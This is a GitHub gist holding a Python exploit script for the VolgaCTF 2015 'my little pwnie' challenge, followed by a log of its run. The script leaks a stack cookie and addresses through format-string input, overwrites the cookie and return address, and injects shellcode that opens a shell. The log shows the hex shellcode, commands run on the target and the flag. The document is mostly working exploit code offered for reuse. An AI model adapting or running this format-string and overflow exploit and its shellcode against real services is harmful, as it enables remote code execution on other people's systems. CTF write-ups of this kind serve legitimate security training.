Created
May 3, 2015 15:39
-
-
Save g05u/5be6f198fbde723ac178 to your computer and use it in GitHub Desktop.
Exploit Little Pwnie VolgaCTF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct, sys, time, re | |
| from nulllife import * | |
| import requests, urllib | |
| # Volga CTF 2015 | |
| # exploit my little pwnie | |
| # www.null-life.com / @_g05u_ | |
| FD = 4 | |
| s = NullSocket('pwnie.2015.volgactf.ru', 7777) | |
| #s = NullSocket('kali64', 1337) | |
| shellcode = NullShell('dup2').get(FD) + NullShell('exec').get() | |
| shellcode = shellcode.rjust(58, '\x90') | |
| print s.readuntil('back: ') | |
| s.writeline('0x%26$08x') | |
| cookie = int(s.readline()[6:-1], 16) | |
| print '[*] Cookie: 0x%08x' % cookie | |
| s.readuntil('back: ') | |
| s.writeline('0x%6$08x') | |
| shellcode_addr = int(s.readline()[6:-1], 16) - 0x70 | |
| print '[*] Shellcode Address: 0x%08x' % shellcode_addr | |
| print '[*] Overwrite RET' | |
| s.readuntil('back: ') | |
| s.write('%138x' + 'A' * 16 + struct.pack('<I', shellcode_addr) + chr(FD)) #overwrite ret | |
| print '[*] Overwrite cookie' | |
| s.readuntil('back: ') | |
| s.write('%122x' + struct.pack('<I', cookie + 1) + '\x00') #overwrite cookie | |
| print '[*] Overwrite null byte in cookie' | |
| s.readuntil('back: ') | |
| s.write('%122x') #set null byte in cookie | |
| print '[*] Write shellcode' | |
| s.readuntil('back: ') | |
| print '[!] Shellcode: %s' % shellcode.encode('hex') | |
| s.write(shellcode + '\x00') #set null byte in cookie | |
| print '[***] Got shell!!!' | |
| s.interactive() | |
| ''' | |
| $ python xpl_pony.py | |
| This is a simple echo server. Type exit to quit. | |
| Type string to echo back: | |
| [*] Cookie: 0x5b1a5400 | |
| [*] Shellcode Address: 0xffcadbfc | |
| [*] Overwrite RET | |
| [*] Overwrite cookie | |
| [*] Overwrite null byte in cookie | |
| [*] Write shellcode | |
| [!] Shellcode: 909090909090909090909090909090909031db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80 | |
| [***] Got shell!!! | |
| I strip this awful symbol | |
| id | |
| uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev) | |
| ls -la | |
| total 908 | |
| drwxrwxr-x 2 ubuntu ubuntu 4096 May 3 05:33 . | |
| drwxr-xr-x 5 ubuntu ubuntu 4096 May 3 05:24 .. | |
| -rwxrwxr-x 1 ubuntu ubuntu 9720 May 3 05:24 my_little_pwnie | |
| -rw-rw-r-- 1 ubuntu ubuntu 28 May 3 05:24 you_can_find_flag_in_this_file.txt | |
| -rw-r--r-- 1 root root 900476 May 3 10:52 zzz_logs | |
| cat you_can_find_flag_in_this_file.txt | |
| flag{fmt_string+bof=exploit} | |
| exit | |
| *** Connection closed by remote host *** | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment